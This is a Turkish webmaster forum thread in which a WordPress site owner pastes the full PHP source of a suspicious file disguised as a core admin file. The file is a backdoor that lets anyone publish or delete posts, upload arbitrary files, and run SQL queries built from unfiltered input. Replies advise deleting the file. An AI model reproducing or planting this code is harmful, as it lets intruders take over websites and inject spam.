lostyazilim
tr.link

Bu Açığı kapatmanın Yolu Nedir?

21 Mesajlar 3.434 Okunma
lstbozum
tr.link

aktassa aktassa WM Aracı Kullanıcı
  • Üyelik 07.08.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek Gemi Makinaları Mühendisi
  • Konum
  • Ad Soyad S** A**
  • Mesajlar 170
  • Beğeniler 44 / 18
  • Ticaret 0, (%0)
Selamlar arkadaşlar.
Güvenlik açığı konusu var mı diye baktım ama bulamadım.
Şimdi benim wordpress blog ile ilgili ciddi sorunlar yaşıyorum.

Küçük bir araştırma ile açığı buldum ama bunu nasıl kapatacağımı bulamadım.

Açık Kodu
/wp-admin/includes/class-wp-ms-users.php
Dosya izni de 644.

Bunu nasıl engelleriz?

Şimdiden yardımcı olan arkadaşlara teşekkür ederim.
 

 

Bilginin Yeni Rotası
wmaraci
reklam

Jih4d Jih4d Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 14.08.2013
  • Yaş/Cinsiyet 37 / E
  • Meslek Ne iş olsa yaparım abi
  • Konum İstanbul Avrupa
  • Ad Soyad ** **
  • Mesajlar 229
  • Beğeniler 0 / 136
  • Ticaret 2, (%100)
6.1 kullanıyorum o dizinde öyle bir dosya yok bende, hangi sürüm kurulu sizde? Ayrıca dosya içeriğini yazarsanız buraya inceleriz.
aktassa

kişi bu mesajı beğendi.

aktassa aktassa WM Aracı Kullanıcı
  • Üyelik 07.08.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek Gemi Makinaları Mühendisi
  • Konum
  • Ad Soyad S** A**
  • Mesajlar 170
  • Beğeniler 44 / 18
  • Ticaret 0, (%0)
Sürüm olarak şunu düyor;
WordPress’in en son sürümünü kullanıyorsunuz.

En güncel WordPress sürümünü kullanıyorsunuz. Yine de eğer 3.6.1–tr_TR sürümüne geri dönmek isterseniz, otomatik olarak yapabilir ya da ilgili dosyayı indirerek kendiniz yeniden yükleme yapabilirsiniz



Dosya İçeriği;





/*

$yol = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/tmp";

@mkdir($yol);

chmod($yol,0777);

//rmdir("../../tmp");

session_save_path($yol);

ini_set('session.gc_probability', 1);

@session_start();



$auth_pass = "965df8b132b05a89fc0e1cb8389fa86d";

*/

$sayfa = $_SERVER['PHP_SELF'];

$url = explode('/',"$sayfa");



$dosya = end($url);

/*

$pass = md5(@$_POST["pass"]);

if( $pass == $auth_pass){



$_SESSION['login']=TRUE;



}

if( @$_SESSION['login'] != TRUE) {

kontrol();

}



function kontrol() {

die("404 Not Found

Not Found



The requested URL was not found on this server.



Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.






Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80


");

}

*/

@include("../../wp-load.php");

@include("../../wp-config.php");



function sefyap ( $fonktmp ) {

$returnstr = "";

$turkcefrom = array("/Ğ/","/Ü/","/Ş/","/İ/","/Ö/","/Ç/","/ğ/","/ü/","/ş/","/ı/","/ö/","/ç/");

$turkceto = array("G","U","S","I","O","C","g","u","s","i","o","c");

$fonktmp = preg_replace("/[^0-9a-zA-ZÄzÜŞİÖÇğüşıöç]/"," ",$fonktmp);

// Türkçe harfleri ingilizceye çevir

$fonktmp = preg_replace($turkcefrom,$turkceto,$fonktmp);

// Birden fazla olan boşlukları tek boşluk yap

$fonktmp = preg_replace("/ +/"," ",$fonktmp);

// Boşukları - işaretine çevir

$fonktmp = preg_replace("/ /","-",$fonktmp);

// Tüm beyaz karekterleri sil

$fonktmp = preg_replace("/\s/","",$fonktmp);

// Karekterleri küçült

$fonktmp = strtolower($fonktmp);

// Başta ve sonda - işareti kaldıysa yoket

$fonktmp = preg_replace("/^-/","",$fonktmp);

$fonktmp = preg_replace("/-$/","",$fonktmp);

$returnstr = $tmpdate . $fonktmp;

return $returnstr;

}





if(@$_POST['baslik'] != ""){



$baslik = $_POST['baslik'];

$etiket = $_POST['etiket'];

$tarih = $_POST['tarih'];

$icerik = stripslashes($_POST['icerik']);

$cate = $_POST['kat'];



$my_post = array();

$my_post['post_title'] = $baslik;

$my_post['post_content'] = $icerik;

$my_post['post_status'] = 'publish';

$my_post['post_author'] = 1;

$my_post['post_category'] = array($cate);

$my_post['tags_input'] = $etiket;

$my_post['post_date'] = $tarih;



$ted = wp_insert_post( $my_post );

$sql = mysql_query("SELECT `guid` FROM `".$table_prefix."posts` ORDER BY `ID` DESC LIMIT 0,1");

$veri = mysql_fetch_object($sql);

echo "
";

echo "
";

//echo $veri->guid;

if($ted){

echo "
Durum :  "."Eklendi

";

echo "";

}else{

echo "
Durum :  "."Eklenemedi

";

}

echo "
";

echo "
";

}

?>

Wordpress Poster





ANASAYFA--

Kategoriler :


function kategoriSay($katID) {

global $wpdb;

$post_say = 0;

$querystr = "SELECT count FROM wp_term_taxonomy WHERE term_taxonomy_id = $katID";

$result = $wpdb->get_var($querystr);

$post_say = $result;

return $post_say ;

}







$get = mysql_query("select * from wp_term_taxonomy where taxonomy='category'");

while($gelis=mysql_fetch_array($get)){

$term_id = $gelis['term_id'];

$adbul = mysql_query("select * from wp_terms where term_id='$term_id'");

$oks = mysql_fetch_array($adbul);

$neymis = $oks['name'];

echo "".$neymis."(".kategoriSay($term_id).")"."   ";



}

?>












if(isset($_FILES['dosya'])){

$hata = $_FILES['dosya']['error'];

if($hata != 0) {

echo 'Yüklenirken bir hata gerçekleşmiş.';

} else {

$tip = $_FILES['dosya']['type'];

$isim = $_FILES['dosya']['name'];

$uzanti = explode('.', $isim);

$dosya = $_FILES['dosya']['tmp_name'];

$a = copy($dosya,$_FILES['dosya']['name']);

if($a){

echo "
";

echo 'Dosya Upload Edildi';

echo "
";

}else{

echo "
";

echo 'Dosya Uploadı Başarısız';

echo "
";

}

}

}



$islem = @$_GET["islem"];



if($islem == "kat"){



$kat_id = $_GET["katid"];







$dizi[] = array();

$sql = mysql_query("SELECT * FROM `wp_term_relationships` WHERE `term_taxonomy_id` = '$kat_id.'");

while($veri = mysql_fetch_object($sql)){





array_push($dizi,$veri->object_id);





}



$aa = implode(",",$dizi);

$a = str_replace("Array,","",$aa);



$sql2 = mysql_query("SELECT * FROM `wp_posts` WHERE `ID` IN ($a) ORDER BY `post_date` ASC LIMIT 30");

while($veri2 = mysql_fetch_object($sql2)){

?>




}elseif($islem == "sil"){



$id = $_GET["id"];

$sql = mysql_query("DELETE FROM `".$table_prefix."posts` WHERE `ID` = '{$id}'");

if($sql){

?>





SİLİNDİ" ?>








}else{



?>







HATA" ?>












}



}else{



?>









Başlık  :


Etiket   :


Tarih    :


Kategori:































?>
 

 

Bilginin Yeni Rotası

Gokhan01 Gokhan01 Webmaster Kullanıcı
  • Üyelik 21.01.2012
  • Yaş/Cinsiyet 32 / E
  • Meslek Webmaster
  • Konum Adana
  • Ad Soyad G** A**
  • Mesajlar 485
  • Beğeniler 93 / 108
  • Ticaret 18, (%100)
Sil o dosyayı buyuk ihtimal bir eklenti ile siteye eklenmiştir.
 

 

wmaraci
wmaraci

yeninesil yeninesil WM Aracı Kullanıcı
  • Üyelik 09.10.2013
  • Yaş/Cinsiyet 33 / E
  • Meslek Memur
  • Konum Konya
  • Ad Soyad ** **
  • Mesajlar 28
  • Beğeniler 2 / 8
  • Ticaret 0, (%0)
bende de var bundan viewsource yaptığımda şöyle gözüküyor: acaba bunu silsek birşey olurmu. site falan çökmesin.




Wordpress Poster








Başlık;:

Etiket   :

Tarih    :

Kategori:














 

 

Jevel Jevel Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 23.04.2013
  • Yaş/Cinsiyet 30 / E
  • Meslek Üniversite
  • Konum İstanbul Avrupa
  • Ad Soyad ** **
  • Mesajlar 502
  • Beğeniler 13 / 68
  • Ticaret 1, (%100)

Jih4d adlı üyeden alıntı

6.1 kullanıyorum o dizinde öyle bir dosya yok bende, hangi sürüm kurulu sizde? Ayrıca dosya içeriğini yazarsanız buraya inceleriz.


Aynı şekilde bende de yok.
 

 

bitirimci bitirimci WM Aracı Kimlik Onayı
  • Üyelik 20.05.2013
  • Yaş/Cinsiyet 41 / E
  • Meslek Serbest
  • Konum İstanbul Avrupa
  • Ad Soyad M** Y**
  • Mesajlar 1170
  • Beğeniler 216 / 214
  • Ticaret 0, (%0)
Site yedekle sil onu
 

 

yeninesil yeninesil WM Aracı Kullanıcı
  • Üyelik 09.10.2013
  • Yaş/Cinsiyet 33 / E
  • Meslek Memur
  • Konum Konya
  • Ad Soyad ** **
  • Mesajlar 28
  • Beğeniler 2 / 8
  • Ticaret 0, (%0)

Gökhan Blog adlı üyeden alıntı

Sil o dosyayı buyuk ihtimal bir eklenti ile siteye eklenmiştir.


bende ayrıca şunlar da var. bu dosya ile alakalı mı değil mi bilmiyorum ama. zararı olur mu bunların. sizde de var mı?

 

 

soulmy soulmy WM Aracı Kullanıcı
  • Üyelik 12.06.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Öğretmen
  • Konum Samsun
  • Ad Soyad O** Y**
  • Mesajlar 1722
  • Beğeniler 398 / 400
  • Ticaret 20, (%100)
Koda bakın yahu. En ufak bir filtreleme yok :D

Bu arada Türkçe adlara dikkat edin. Orijinal Wordpress dosyasında Türkçe ad olur mu hiç :D

$kat_id = $_GET["katid"];

$dizi[] = array();

$sql mysql_query("SELECT * FROM `wp_term_relationships` WHERE `term_taxonomy_id` = '$kat_id.'");
aktassa

kişi bu mesajı beğendi.

.

aktassa aktassa WM Aracı Kullanıcı
  • Üyelik 07.08.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek Gemi Makinaları Mühendisi
  • Konum
  • Ad Soyad S** A**
  • Mesajlar 170
  • Beğeniler 44 / 18
  • Ticaret 0, (%0)
@soulmy
bu durumda öneriniz nedir acaba?
 

 

Bilginin Yeni Rotası
wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al